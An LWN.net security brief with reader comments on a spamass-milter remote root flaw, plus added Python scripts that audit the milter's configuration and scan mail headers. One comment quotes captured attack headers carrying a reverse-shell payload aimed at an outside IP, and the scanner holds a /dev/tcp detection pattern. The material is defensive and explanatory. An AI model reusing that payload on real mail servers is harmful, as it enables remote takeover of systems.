
SpamAssassin-milter has a remote root vulnerability

SpamAssassin-milter plugs SpamAssassin into mail agents which speak the "milter" protocol. It is, evidently, trivially easy to get this plugin to execute commands as root when it is used with Postfix in some configurations, and possibly with other mailers as well. There is a bug tracker entry where progress on a patch can be followed; the developers do not seem to be in a great hurry, despite the fact that exploits are circulating. Sites using SpamAssassin-milter should probably just disable it for now. (Thanks to Christof Damian.)

SpamAssassin-milter has a remote root vulnerability

Posted Mar 17, 2010 19:41 UTC (Wed) by dondelelcaro (subscriber, #28431)

In order for this to be a problem you have to have spamass-milter running as root (not the default in Debian) and using -x (also not the default). There's no reason to run spamass-milter as root at all (to use -x, you just add the user to smmsp). [This *is* a bug that needs to be fixed; I've already got a patch for it in my svn repository... I haven't uploaded it yet primarily because neither I nor upstream use -x, so I haven't had a chance to test it.]

SpamAssassin-milter has a remote root vulnerability

Posted Mar 17, 2010 23:55 UTC (Wed) by ewen (subscriber, #4772)

From what I can see on my systems spamass-milter on Debian Lenny (ie, stable) will run spamass-milter as the spamass-milter user unless you try hard to do otherwise. Debian Etch (ie, oldstable) runs spamass-milter as root in the default init scripts. But "-x" isn't included in the default arguments. (This seems to be yet another reason to upgrade the last few old Debian Etch systems.)

Ewen

SpamAssassin-milter has a remote root vulnerability

Posted Mar 18, 2010 2:11 UTC (Thu) by dondelelcaro (subscriber, #28431)

If you're still running etch, you can just install the backport of spamassassin 0.3.1-7 to etch, which doesn't have this problem. [I don't know if I'll make a security update for etch that isn't a backport, as those intervening versions have a few very useful patches.]

SpamAssassin-milter has a remote root vulnerability

Posted Mar 18, 2010 2:24 UTC (Thu) by ewen (subscriber, #4772)

Thanks for the hint. Given that security support has already stopped for Etch I didn't expect this to be fixed in Etch, and was considering doing a backport from Lenny myself; it's very handy it's already done. Mostly I wanted to point out to people who still had Etch boxes that they couldn't just assume that Debian had always run spamass-milter in a non-root configuration.

For others: http://packages.debian.org/etch-backports/spamass-milter

Ewen

Then SpamAssassin-milter has a remote non-root vulnerability

Posted Mar 18, 2010 3:13 UTC (Thu) by JoeBuck (subscriber, #2330)

If a machine can be made to run arbitrary commands from a remote source as an ordinary user, that suffices for a botnet.
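An added check, not code from the page or from the spamass-milter project: the audit below reads `ps` output and classifies each spamass-milter process along the two conditions the comments above name, whether it runs as root and whether -x is on. Both together is the remote-root case; -x alone is the remote non-root case the previous comment warns about. The sample process table is constructed, and the binary path and socket name in it are assumptions.

```python
import shlex
import subprocess
from typing import Dict, List


# Constructed sample of `ps -eo user:20,args --no-headers` output (not taken
# from any real host). The two spamass-milter lines show the exposed and the
# recommended configuration; the paths and socket names are assumptions.
SAMPLE_PS = """\
root                 /usr/sbin/spamass-milter -p /var/run/spamass/spamass.sock -f -x
spamass-milter       /usr/sbin/spamass-milter -p /var/run/spamass/spamass.sock -f
postfix              smtpd -n smtp -t inet -u -c
root                 /usr/lib/postfix/master
"""


def classify(user: str, argv: List[str]) -> str:
    """Map (user, argv) of a spamass-milter process to the exposure the thread
    describes: -x is the option the exploit depends on, and the uid the
    daemon runs under decides whose privileges an injected command gets."""
    expands = "-x" in argv[1:]
    if expands and user == "root":
        return "remote root: -x enabled and running as root"
    if expands:
        return f"remote non-root: -x enabled, injected commands would run as {user}"
    if user == "root":
        return "no -x, but running as root for no reason; run it as a dedicated user"
    return "ok: unprivileged and no -x"


def audit(ps_output: str) -> List[Dict[str, object]]:
    """Pick spamass-milter processes out of `ps -eo user:20,args` output."""
    findings: List[Dict[str, object]] = []
    for line in ps_output.splitlines():
        parts = line.split(None, 1)
        if len(parts) != 2:
            continue
        user, cmdline = parts
        try:
            argv = shlex.split(cmdline)
        except ValueError:
            continue  # unbalanced quotes in some unrelated command line
        if not argv or argv[0].rsplit("/", 1)[-1] != "spamass-milter":
            continue
        findings.append({"user": user, "argv": argv, "verdict": classify(user, argv)})
    return findings


def audit_live() -> List[Dict[str, object]]:
    """Run the audit against the local process table (procps `ps` on Linux)."""
    ps = subprocess.run(
        ["ps", "-eo", "user:20,args", "--no-headers"],
        capture_output=True, text=True, check=True,
    )
    return audit(ps.stdout)


if __name__ == "__main__":
    for finding in audit(SAMPLE_PS):
        print(f"{finding['user']:15} {finding['verdict']}")
```

The user column is widened to 20 characters because `ps` truncates long user names such as spamass-milter in the default width, which would make the root test unreliable.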

SpamAssassin-milter has a remote root vulnerability

Posted Mar 19, 2010 21:34 UTC (Fri) by asherringham (subscriber, #33251)

I queried this today - seen in my Postfix logs this morning:

X-Original-To: "root+:|exec /bin/sh 0</dev/tcp/92.243.5.144/9991 1>&0 2>&0"
Delivered-To: "root+:|exec /bin/sh 0</dev/tcp/92.243.5.144/9991 1>&0
2>&0"@calliope.bitfolk
Received: from bluedick (debian01.vservers.at [194.106.206.7])
by calliope (Postfix) with SMTP id F1B31DC001
for <"root+:|exec /bin/sh 0</dev/tcp/92.243.5.144/9991 1>&0
2>&0">; Wed, 17 Mar 2010 22:53:13 +0000 (GMT)
Message-Id: <20100317225313.F1B31DC001@calliope>
Date: Wed, 17 Mar 2010 22:53:13 +0000 (GMT)
From: blue@dick.com
To: undisclosed-recipients:;

Looks like an attempt via this vulnerability ... lucky I don't use this spamass-milter.

Alastair
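The headers above, as an added example that is not part of the original post: a scanner for the injection pattern in envelope recipients. It unfolds the header block (the wrapped fields are written here as RFC 5322 continuation lines with leading whitespace, an assumption about how Postfix folded them), takes the envelope recipient from X-Original-To, Delivered-To and the `for <...>` clause of Received, and flags any that carry shell metacharacters or a /dev/tcp path. `safe_to_expand` is an allow-list of my own that a milter could apply before handing an address to any external command; it is not spamass-milter's code. The benign message is constructed.

```python
import re
from typing import List, Tuple

# The headers posted in the comment above, with the wrapped parts written as
# RFC 5322 continuation lines (leading whitespace), which is assumed to be
# how Postfix folded them.
SAMPLE_HEADERS = """\
X-Original-To: "root+:|exec /bin/sh 0</dev/tcp/92.243.5.144/9991 1>&0 2>&0"
Delivered-To: "root+:|exec /bin/sh 0</dev/tcp/92.243.5.144/9991 1>&0
 2>&0"@calliope.bitfolk
Received: from bluedick (debian01.vservers.at [194.106.206.7])
 by calliope (Postfix) with SMTP id F1B31DC001
 for <"root+:|exec /bin/sh 0</dev/tcp/92.243.5.144/9991 1>&0
 2>&0">; Wed, 17 Mar 2010 22:53:13 +0000 (GMT)
Message-Id: <20100317225313.F1B31DC001@calliope>
Date: Wed, 17 Mar 2010 22:53:13 +0000 (GMT)
From: blue@dick.com
To: undisclosed-recipients:;
"""

# Constructed benign message for comparison (not from the page).
BENIGN_HEADERS = """\
X-Original-To: root+lists@calliope.bitfolk
Delivered-To: root+lists@calliope.bitfolk
Received: from mx.example.org (mx.example.org [192.0.2.10])
 by calliope (Postfix) with ESMTP id 0123456789
 for <root+lists@calliope.bitfolk>; Wed, 17 Mar 2010 22:55:00 +0000 (GMT)
From: someone@example.org
To: root+lists@calliope.bitfolk
"""


def unfold(raw: str) -> List[Tuple[str, str]]:
    """Split a header block into (name, value) pairs, joining folded lines."""
    fields: List[Tuple[str, str]] = []
    for line in raw.splitlines():
        if not line.strip():
            continue
        if line[0] in " \t" and fields:
            name, value = fields[-1]
            fields[-1] = (name, value + " " + line.strip())
        else:
            name, _, value = line.partition(":")
            fields.append((name.strip(), value.strip()))
    return fields


# Fields that record the envelope recipient, which is what a milter sees at
# RCPT TO time. The To: header is display text chosen by the sender and is
# deliberately not consulted ("undisclosed-recipients:;" would only add noise).
ENVELOPE_FIELDS = {"x-original-to", "delivered-to"}
RECEIVED_FOR = re.compile(r"\bfor\s+<(.+?)>;")

# Characters that are legal inside a quoted local-part but decisive inside a
# shell command line: pipes, separators, redirections, substitutions, plus the
# bash-only /dev/tcp pseudo-device used for reverse shells.
SHELL_META = re.compile(r"[|;&`<>]|\$\(|\$\{|/dev/tcp/")


def envelope_recipients(fields: List[Tuple[str, str]]) -> List[Tuple[str, str]]:
    """Collect (field, address) pairs for every envelope recipient present."""
    out: List[Tuple[str, str]] = []
    for name, value in fields:
        lname = name.lower()
        if lname in ENVELOPE_FIELDS:
            out.append((name, value))
        elif lname == "received":
            match = RECEIVED_FOR.search(value)
            if match:
                out.append((name, match.group(1)))
    return out


def scan(raw: str) -> List[Tuple[str, str]]:
    """Return the envelope recipients that look like a shell payload."""
    return [(f, a) for f, a in envelope_recipients(unfold(raw)) if SHELL_META.search(a)]


# Allow-list an address must satisfy before anything passes it to an external
# command: dot-atom local part ('+' subaddressing included) and optional
# domain. Everything else, quoted local-parts included, is refused.
EXPANDABLE = re.compile(r"^[A-Za-z0-9._+=-]+(@[A-Za-z0-9.-]+)?$")


def safe_to_expand(addr: str) -> bool:
    return EXPANDABLE.fullmatch(addr.strip("<>")) is not None


if __name__ == "__main__":
    for field, addr in scan(SAMPLE_HEADERS):
        print(f"{field}: suspicious recipient {addr!r}")
    print("benign hits:", scan(BENIGN_HEADERS))
```

The allow-list is stricter than RFC 5321 permits; that is the point. An address a milter cannot match against a dot-atom pattern should be passed to the expansion step as a single argv element via exec, or not at all, never through a shell.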

Copyright © 2010, Eklektix, Inc.
Comments and public postings are copyrighted by their creators.
Linux is a registered trademark of Linus Torvalds